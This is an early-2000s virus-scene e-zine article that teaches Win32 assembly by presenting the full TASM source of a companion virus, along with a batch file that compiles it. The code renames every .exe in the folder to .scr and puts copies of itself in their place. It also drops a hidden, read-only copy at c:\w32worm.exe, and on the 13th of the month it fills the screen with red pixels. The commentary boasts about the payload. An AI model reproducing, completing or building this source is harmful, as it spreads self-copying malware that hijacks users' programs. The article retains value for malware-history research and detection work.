Strange Article - Starting with win32asm by NeKr0
Hi, this is my old article, translated from the russian e-zine "Habitat".
In this article I'll show how to write in win32asm easily. Forget your HLL and
use the power of pure asm (hi philie ;) .
This companion virus is written in TASM syntax. It works in the current
folder: it searches for *.exe files, renames them to *.scr and writes itself under the
found file's name, and makes a hidden dropper in c:\ . It checks the date and if day=13
shows a graphical payload (bloody fog).
When you code in win32asm you must declare every API that your program uses,
like this:
;====================== tasm directives
; Syntax/target: TASM with MASM-style directives, 32-bit flat model,
; Win32 API resolved through import32.lib (see make.bat at the end).
.386 ;
.model flat ;flat memory model (wind0ze works in this model)
;====================== API list
; Every Win32 API called in the code segment must be declared extrn first.
; file enumeration / rename / copy / attribute change
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn SetFileAttributesA:proc
extrn MoveFileA:proc
extrn CopyFileA:proc
; own command line, host re-launch, string copy, exit
extrn GetCommandLineA:proc
extrn CreateProcessA:proc
extrn lstrcpyA:proc
extrn ExitProcess:proc
; declared but never called anywhere in the listing below
extrn CreateFileA:proc
extrn CloseHandle:proc
; payload: message box and drawing on the screen DC
extrn MessageBoxA:proc
extrn GetDC:proc
extrn SetPixel:proc
extrn GetSystemMetrics:proc
extrn ExitProcess:proc ;(also declared above)
extrn GetSystemTime:proc ;date check that decides between payload and host launch
extrn MessageBoxA:proc ;(also declared above)
;====================== end of API list
Next. We need a place to store our values. The best way is to store them in the data
segment.
;====================== data segment
; Writable globals.  Several buffers are laid out to match the Win32
; structures the APIs below are handed (SYSTEMTIME, PROCESS_INFORMATION,
; STARTUPINFO, WIN32_FIND_DATA).
.data ; declaration segment of data
Tdate: ;Place for date/time values -- SYSTEMTIME, eight WORDs, filled by GetSystemTime
Tyear dw 0
Tmonth dw 0
Tdow dw 0
Tday dw 0 ;day of month; compared against 13 at runz: to trigger the payload
Thour dw 0
Tmin dw 0
Tsec dw 0
Tmilsec dw 0
xcoord dd 0 ;There be width of screen
ycoord dd 0 ; ------ height of screen
newx dd 0 ;Coords for dots
newy dd 0 ;
dc dd 0 ;Handle of screen (DC returned by GetDC)
exe db '*.EXE',0 ;mask for searching -- only the current directory is enumerated
FHandle dd 0 ;find handle returned by FindFirstFileA, reused for FindNextFileA
processinf dd 4 dup (0) ; PROCESS_INFORMATION
startupinf dd 4 dup (0) ; STARTUPINFO
SearchRec db 44 dup (0) ;There is region for search data-|  WIN32_FIND_DATA header (44 bytes)
FileName db 274 dup (0) ;file name in search data -|  cFileName[260] + cAlternateFileName[14]
NewName db 260 dup (0) ;array for new file name (the .scr name given to the host)
MyName db 260 dup (0) ;array for virus name (own command line; see MyName+1 below)
filehandle dd 0 ;file handle (not referenced in the listing below)
drp db 'c:\w32worm.exe',0 ;path & file name for dropper -- on-disk artefact, set READONLY|HIDDEN after copy
CopyLeft db ' [Win32.Companion by NeKr0!] ',0 ; copyleft -- MessageBox caption shown by the payload
txt db '!! Vivat Egor Letov !!',0 ; My favorit singer -- MessageBox text shown by the payload
;====================== end of data segment
Yeah. Time to write code.
;====================== code segment
;-----------------------------------------------------------------------
; worm -- entry point (named by `end worm` at the bottom of the listing).
; Flow, as read from the code:
;   1. Copy own command line into MyName, find the first '.' and
;      terminate the string right after the three-character extension.
;      esi is left pointing one past that '.' and is reused at runz:.
;   2. Enumerate *.EXE in the current directory.  For each match:
;      rename name.exe -> name.scr, then copy this executable in under
;      the original name.exe (companion infection).  CopyFileA's result
;      is not checked.
;   3. Copy this executable to drp and mark it READONLY|HIDDEN.
;   4. GetSystemTime; if the day of month is 13 run the payload
;      (MessageBox, then an endless SetPixel loop -- never returns).
;      Otherwise rewrite own extension inside MyName to "scr" and
;      CreateProcess that file (the renamed host), then ExitProcess.
; Registers: edi = scratch string cursor; esi = pointer just past the
; '.' in MyName, live from found_dot: to runz: (relies on the Win32 API
; preserving esi across calls); eax = last API return value.
;-----------------------------------------------------------------------
.code ;declaration code segment
worm:
call GetCommandLineA ;Get command line
push eax ;pointer to command line
push offset MyName ;pointer to array for virus name
call lstrcpyA ;copy
mov edi,eax ;pointer to virus name (lstrcpyA returns its destination)
search: ;scan forward for the first '.'; no bound check, a '.' is assumed to exist
cmp byte ptr [edi], '.' ;compare char
jz found_dot ;if char='.' then go out
inc edi ;add edi 1
jmp search ;search again
found_dot:
mov esi,edi ;store pointer to dot in esi
inc esi ;add esi 1 -- esi now points at the extension; reused at runz:
add edi,4 ;skip the '.' plus a three-character extension
mov byte ptr [edi],00 ;write 0 after file name
infect: ;
push offset SearchRec ;see data segment
push offset exe ;mask for search
call FindFirstFileA ;search
mov dword ptr [FHandle],eax ;search handle
check_exe: ;eax = find handle on the first pass, the BOOL from FindNextFileA on later passes
cmp eax,-1 ;check for errors
je Drop ;like a '*.exe not found'
or eax,eax ;
jz Drop ;if error - make dropper (also the normal "no more files" exit of the loop)
infect_file: ;
push offset FileName ;
push offset NewName ;
call lstrcpyA ;copy name of found file in our array
mov edi,eax ;pointer to copied file name
search_2:
cmp byte ptr [edi],'.' ;search dot in file name
jz found_dot2 ;
inc edi ;
jmp search_2 ;
found_dot2:
inc edi ;
mov dword ptr [edi],'rcs' ;change extension to SCR (little-endian store writes "scr")
mov byte ptr [edi+3],0 ;add 0 after file name
push offset NewName ;
push offset FileName ;
call MoveFileA ;rename exe to scr
or eax,eax ;check errors
jz Next ;if error - find next file
push 1 ;bFailIfExists = TRUE
push offset FileName ;
push offset MyName+1 ;Why MyName+1? Coz in wind0ze when
;you run file, it runs as "file.exe"
;and MyName="file.exe
;add 1 and MyName=file.exe
call CopyFileA ;Copy our body with found file name (return value not checked)
Next:
push offset SearchRec ;
push dword ptr [FHandle] ;
call FindNextFileA ;Search next file
jmp check_exe ;
drop: ;Make dropper
push 0 ;bFailIfExists = FALSE
push offset drp ;
push offset MyName+1 ;
call CopyFileA ;Copy our body to c:\
push 00000001h OR 00000002h ;FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN
lea eax,drp ;
push eax ;
call SetFileAttributesA ;Set attributes: hidden
runz: ;
push offset Tdate ;Check date
call GetSystemTime
cmp Tday,13 ; Doom day?
je payload ; Yeah!!!
;CreateProcessA arguments, pushed right to left:
push offset processinf ;In other days run host program -- lpProcessInformation
push offset startupinf ;lpStartupInfo
sub eax,eax ;
push eax ;lpCurrentDirectory = NULL
push eax ;lpEnvironment = NULL
push 10h ;dwCreationFlags
push eax ;bInheritHandles = FALSE
push eax ;lpThreadAttributes = NULL
push eax ;lpProcessAttributes = NULL
call GetCommandLineA ;
inc eax ;
push eax ;lpCommandLine = own command line without its leading quote
mov dword ptr [esi],'rcs' ;esi still point to name of executed file
;change extension of it file -- MyName now names the renamed host (.scr)
push offset MyName+1 ;lpApplicationName
call CreateProcessA ;and run it
push 0 ;
call ExitProcess ;Go out here
payload: ;Kinda payload :)
push 0 ;uType
push offset CopyLeft ;lpCaption
push offset txt ;lpText
push 0 ;hWnd
call MessageBoxA ;Horror MessageBox
xor eax,eax ;
push eax
call GetDC ;GetDC(NULL): device context for the whole screen
mov dword ptr dc,eax ;Bllody fog there
push 16 ;Learn asm if you are interested
call GetSystemMetrics ;what it does :p
mov dword ptr xcoord,eax
push 17
call GetSystemMetrics ;
mov dword ptr ycoord,eax
next_pix: ;endless loop -- no exit condition, the process only ends when killed
mov eax,dword ptr xcoord ;
push eax
call random
mov dword ptr newx,eax
mov eax,dword ptr ycoord ;
push eax
call random
mov 4 ptr newy,eax
push 200 ;COLORREF 200: red channel only
push newy ;
push newx ;
push dc ;
call SetPixel ;
jmp next_pix ;
random proc ;Random procedure
;where did i steal it? i forgot :)
; eax = random(limit) -- one dword argument, popped by the callee (ret 4).
; In:   [esp+4] on entry = limit (the caller pushes xcoord or ycoord)
; Out:  eax = (low 32 bits of the time-stamp counter mod limit) + one byte
;       read from I/O port 40h (legacy timer).  edx is preserved, flags clobbered.
; NOTE(review): port I/O from a user-mode process is a privileged
; instruction on NT-family Windows; this routine presumably assumes the
; 9x-era systems of its time -- confirm before reasoning about its behaviour.
push edx ;
a2a: db 0fh, 31h ;rdtsc emitted as raw opcode bytes: edx:eax = time-stamp counter
;
xor edx, edx ;dividend is just eax; the quotient then always fits (only limit = 0 would fault)
div dword ptr [esp+8] ;edx = eax mod limit; [esp+8] skips the saved edx and the return address
in al,40h ;one byte from port 40h -- see the NOTE above
add dl,al ;stir the timer byte into the remainder
xchg eax, edx ;result into eax
r_out: pop edx ;
ret 4 ;pop the limit argument
random endp
ends ;closes the current (code) segment
end worm ;Kinda end of virus -- `end worm` makes worm: the entry point
;yeah! you have a simple windows virus!!!
;================ end of code
To compile this, use a batch file:
======================================= make.bat
tasm32.exe /mx /m3 worm.asm,,;
tlink32.exe /Tpe /aa /c /v worm.obj,,, import32.lib,
=======================================
P.S.: sorry for my english :)
(c) 2002 NeKr0! (from Habitat e-zine)